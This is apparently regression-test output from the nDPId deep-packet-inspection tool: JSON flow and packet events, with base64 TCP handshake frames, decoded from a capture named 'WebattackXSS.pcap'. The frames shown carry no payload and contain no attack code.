-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347197627,"flow_last_seen":1499347202671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347200170,"flow_last_seen":1499347205672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347201471,"flow_last_seen":1499347206672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347202722,"flow_last_seen":1499347208672,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347324538,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347324538,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8uCpAAD4GDaasEAABwKgKMtquAFARp\/xAAAAAAKACchAweQAAAgQFtAQCCAoBOkRqAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1499347324538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347324538,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2q5SOt2REaf8QaAScSDnxwAAAgQFtAQCCAoD5BXgATpEagEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2970,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1499347324539,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347324539,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0uCtAAD4GDa2sEAABwKgKMtquAFARp\/xBUjrdkoAQAOWGzwAAAQEICgE6RGoD5BXg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347325777,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347325777,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C\/ZAAD4GudqsEAABwKgKMtq8AFA4wE5pAAAAAKACchC19AAAAgQFtAQCCAoBOkWfAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2981,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":2,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347325777,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2rxxlybyOMBOaqAScSADUQAAAgQFtAQCCAoD5BcVATpFnwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":3,"flow_last_seen":1499347325777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347325777,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C\/dAAD4GueGsEAABwKgKMtq8AFA4wE5qcZcm84AQAOWiVwAAAQEICgE6RaAD5BcV"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347328298,"flow_last_seen":1499347328298,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347328298,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56022,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2998,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1499347328298,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328298,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8K4RAAD4GmkysEAABwKgKMtrWAFBZCmOSAAAAAKACchB98AAAAgQFtAQCCAoBOkgWAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1499347328299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347328299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2tYFgFaJWQpjk6AScSAFVgAAAgQFtAQCCAoD5BmMATpIFgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3000,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":3,"flow_last_seen":1499347328299,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347328299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0K4VAAD4GmlOsEAABwKgKMtrWAFBZCmOTBYBWioAQAOWkXQAAAQEICgE6SBYD5BmM"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347329594,"flow_last_seen":1499347329594,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347329594,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56036,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3010,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":1,"flow_last_seen":1499347329594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8olxAAD4GI3SsEAABwKgKMtrkAFD4u+sGAAAAAKACchBVeAAAAgQFtAQCCAoBOklaAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":2,"flow_last_seen":1499347329594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347329594,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2uSvjPx7+LvrB6AScSCLmgAAAgQFtAQCCAoD5BrQATpJWgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3012,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":212,"flow_packet_id":3,"flow_last_seen":1499347329595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347329595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ol1AAD4GI3usEAABwKgKMtrkAFD4u+sHr4z8fIAQAOUqogAAAQEICgE6SVoD5BrQ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347332137,"flow_last_seen":1499347332137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347332137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56062,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1499347332137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8hpdAAD4GPzmsEAABwKgKMtr+AFAKS81CAAAAAKACchBfGAAAAgQFtAQCCAoBOkvVAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":2,"flow_last_seen":1499347332137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347332137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2v58hG58CkvNQ6AScSBTxwAAAgQFtAQCCAoD5B1LATpL1QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":3,"flow_last_seen":1499347332138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347332138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0hphAAD4GP0CsEAABwKgKMtr+AFAKS81DfIRufYAQAOXyzQAAAQEICgE6S9YD5B1L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347333419,"flow_last_seen":1499347333419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56076,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3040,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1499347333419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bENAAD4GWY2sEAABwKgKMtsMAFCNWiFVAAAAAKACchCGpwAAAgQFtAQCCAoBOk0WAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3041,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1499347333420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347333420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2wzHhupcjVohVqAScSCzMgAAAgQFtAQCCAoD5B6MATpNFgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":3,"flow_last_seen":1499347333420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347333420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0bERAAD4GWZSsEAABwKgKMtsMAFCNWiFWx4bqXYAQAOVSOgAAAQEICgE6TRYD5B6M"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347205214,"flow_last_seen":1499347210673,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347206497,"flow_last_seen":1499347211674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347207764,"flow_last_seen":1499347213674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347210270,"flow_last_seen":1499347215675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347211522,"flow_last_seen":1499347216676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347214088,"flow_last_seen":1499347219676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347333709,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347334667,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347334667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3052,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1499347334667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347334667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ruhAAD4GFuisEAABwKgKMtsaAFCxtOCmAAAAAKACchChtQAAAgQFtAQCCAoBOk5OAAAAAAEDAwc="} 